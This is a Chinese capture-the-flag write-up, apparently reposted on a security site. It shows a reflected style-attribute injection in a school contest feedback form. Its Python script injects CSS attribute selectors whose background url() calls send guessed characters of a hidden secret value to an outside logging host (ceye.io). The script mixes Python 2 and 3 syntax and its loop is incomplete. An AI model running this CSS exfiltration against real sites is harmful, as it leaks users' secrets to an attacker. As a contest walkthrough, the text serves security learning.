很简单的xss

admin
admin
admin
138985
文章
114
评论
2024年8月18日01:20:37评论7 views字数 720阅读2分24秒阅读模式

继续是校赛题,这题我们进去看到一个留言框,然后题目提示写下建议,管理员会去看的,结合题目,确定是反射型xss了,尝试一下插入一下js语句进留言板,发现没反应,看下源码发现尖括号被转义了………
emmm………看来想直接简单粗暴的利用是不行的了,继续回去上一页看一下,看见有个选择框,可以选择字体的样式,抓下包改下值成1212,发现在下一个页面的style属性里面有1212………..
嗯,这波操作有丶东西,style属性里面的语句可控,就可以搞事情了,因为现在的浏览器版本比较高,尝试了一下直接利用js伪代码发现不行,只能一个个匹配然后弹回去自己的平台
最后脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 
import requests
strs = "0123456789_qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"
url = "http://laohulaohuhu.cn:32772/"
flag = ""
flag0 = ""
for ch in strs:
    flag = flag0 + ch
    print("trying "+ flag)
    key = {'feedback':'111','style':'#secret[value^="' + flag + '"]{background: url(\'http://abcdef.ceye.io/?xss=' + flag + '\');}'}
    r = requests.post(url=url,data=key)
    if r.status_code == 200:
        print flag
        flag0 = flag
print(flag0)

剩下的可以去自己的平台看一下有没有打到,flag也能出来了

FROM:Xi4or0uji

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月18日01:20:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   很简单的xsshttps://cn-sec.com/archives/3074630.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息